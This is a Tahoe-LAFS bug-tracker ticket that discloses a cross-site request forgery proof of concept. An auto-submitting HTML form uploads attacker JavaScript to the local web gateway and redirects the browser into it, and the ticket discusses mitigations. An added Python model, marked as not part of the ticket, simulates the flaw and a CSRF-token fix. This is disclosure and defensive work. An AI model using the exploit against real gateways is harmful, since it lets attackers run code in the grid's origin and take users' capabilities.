#1859 new defect

Proof-of-concept attack: Upload and execute attacker controlled js from any domain. — at Initial Version

Reported by: nejucomo Owned by: davidsarah
Priority: major Milestone: undecided
Component: code-frontend-web Version: 1.9.2
Keywords: security javascript same-origin capleak websec Cc: frederik.braun+tahoe@…
Launchpad Bug:

Description

Proof of Concept Attack

The following proof of concept shows how an HTML file loaded from any domain into (some) browsers with JavaScript enabled can inject an attacker-controlled script into a grid, and *then* cause the user to execute that script in the domain of the grid:

<html>
<head>
<script>

// The payload is itself an HTML document carrying a script. The angle
// brackets are written as \x3c / \x3e so that the inner "</script>" does not
// terminate this outer script block.
var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY ATTACKER CODE IN MAI DOMAIN " + document.domain + "?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';

// No user interaction is needed: fill in the form and submit it as soon as
// the page has loaded.
window.onload = function () {
  var payload_input = document.getElementById('payload_input');
  payload_input.value = PAYLOAD;

  var the_form = document.getElementById('the_form');
  the_form.submit();
};

</script>
</head>

<body id="body">

<p>
demo attack:
</p>

<p>
This page attempts to inject an attacker controlled script into a <a
href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
this file is loaded from.
</p>

<!-- Cross-origin form POST to the local gateway. A multipart form POST is a
     "simple" request, so the browser sends it without any CORS preflight.
     when_done carries the literal %(uri)s (the % is URL-encoded as %25);
     after the upload the gateway substitutes the new cap into it and
     redirects the browser to the uploaded HTML, which is then rendered from
     the gateway's own origin, 127.0.0.1:3456. -->
<form id="the_form"
      method="POST"
      action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
      enctype="multipart/form-data"
      >
<input id="payload_input" type="text" name="file">
</form>

</body>
</html>

Mitigations:

There are several moving parts at work here. The when_done parameter with uri substitution was very convenient.

I think an upload capability would be the most consistent and thorough solution. Removing bits and pieces which may otherwise be useful, like when_done, feels like a piecemeal defense.

Requiring CSRF tokens may be more comprehensive, but also doesn't sit well with the rest of the capability model. (A CSRF token would be a bit like a "make this kind of HTTP request" temporary capability.)

Related Tickets:

  • #615 is more about bootstrapping an attack rather than illicitly gaining victim capabilities.
  • #1215 is about adding CORS support and how that may create a vulnerability; this script demonstrates that similar vulnerabilities already exist even without CORS support.
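The following is an added example, not Tahoe-LAFS code and not part of the reporter's ticket: a minimal Python model of a web-gateway upload endpoint. It reproduces the two things the proof of concept relies on (any cross-origin POST is honoured, and when_done has %(uri)s replaced by the new cap, so the browser is redirected to attacker bytes served from the gateway's origin) and then shows the CSRF-token variant discussed under Mitigations, where only a page served by the gateway itself can obtain a token. The class and function names, the "URI:FAKE:" cap format and the sample payload are invented for illustration; the gateway address and the when_done value are taken from the PoC form above.

```python
# Added example, not Tahoe-LAFS code: a stand-in for a web gateway's upload
# endpoint.  Gateway, issue_token, upload, upload_with_token and the fake cap
# format are invented for illustration.
import hashlib
import secrets
from urllib.parse import urlsplit, urljoin, unquote

GATEWAY_ORIGIN = "http://127.0.0.1:3456"   # gateway address taken from the PoC form

# Constructed stand-in for the PoC payload: an HTML page carrying a script.
PAYLOAD = '<html><head><script>alert(document.domain)</script></head></html>'

# The when_done parameter from the PoC, URL-decoded; note the %(uri)s placeholder.
WHEN_DONE = unquote("/uri/%25(uri)s?filename=payload.html")


class Gateway:
    def __init__(self):
        self.store = {}       # constructed stand-in for the grid: cap -> bytes
        self.tokens = set()   # CSRF tokens handed out to the gateway's own pages

    @staticmethod
    def fake_cap(data):
        # Not a real Tahoe cap; a content hash keeps the example deterministic.
        return "URI:FAKE:" + hashlib.sha256(data).hexdigest()[:16]

    def upload(self, form):
        """Vulnerable model: every POST is honoured, and when_done is filled in
        with the new cap, so the browser is redirected to the just-uploaded
        bytes served from the gateway's own origin."""
        data = form["file"].encode()
        cap = self.fake_cap(data)
        self.store[cap] = data
        when_done = form.get("when_done")
        if when_done:
            return 303, when_done % {"uri": cap}
        return 200, cap

    def issue_token(self):
        """Hand a fresh token to a page served by the gateway itself.  A page on
        another origin cannot read it (same-origin policy), so it cannot put it
        into a forged form."""
        tok = secrets.token_urlsafe(32)
        self.tokens.add(tok)
        return tok

    def upload_with_token(self, form):
        """Hardened model: refuse uploads that do not carry a token the gateway
        issued; tokens are single-use."""
        tok = form.get("csrf_token")
        if tok is None or tok not in self.tokens:
            return 403, "missing or unknown CSRF token"
        self.tokens.discard(tok)
        return self.upload(form)


def redirect_origin(location):
    """Resolve a Location header against the gateway and return its origin."""
    u = urlsplit(urljoin(GATEWAY_ORIGIN, location))
    return f"{u.scheme}://{u.netloc}"


def run_poc(gw):
    """Replay the cross-origin form from the ticket against the vulnerable endpoint."""
    attacker_form = {"file": PAYLOAD, "when_done": WHEN_DONE}
    status, location = gw.upload(attacker_form)
    return status, location, redirect_origin(location)


def run_poc_with_token(gw):
    """The same forged form against the hardened endpoint: the attacker's page has no token."""
    attacker_form = {"file": PAYLOAD, "when_done": WHEN_DONE}
    return gw.upload_with_token(attacker_form)


def run_legit_with_token(gw):
    """A gateway-served page includes the token it was given and still works."""
    form = {"file": "hello", "when_done": WHEN_DONE, "csrf_token": gw.issue_token()}
    return gw.upload_with_token(form)


if __name__ == "__main__":
    gw = Gateway()
    print(run_poc(gw))               # (303, '/uri/URI:FAKE:...?filename=payload.html', 'http://127.0.0.1:3456')
    print(run_poc_with_token(gw))    # (403, 'missing or unknown CSRF token')
    print(run_legit_with_token(gw))  # (303, '/uri/URI:FAKE:...?filename=payload.html')
```

The vulnerable path shows the chain in one line: the redirect target resolves to the gateway's own origin, so whatever the attacker uploaded now runs with the grid's document.domain. The token check blocks the forged form because the attacker's page, loaded from some other origin, never sees a token; this is the "temporary capability to make this kind of request" the ticket describes, and it is deliberately independent of cookies or of the when_done feature itself.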

Change History (0)
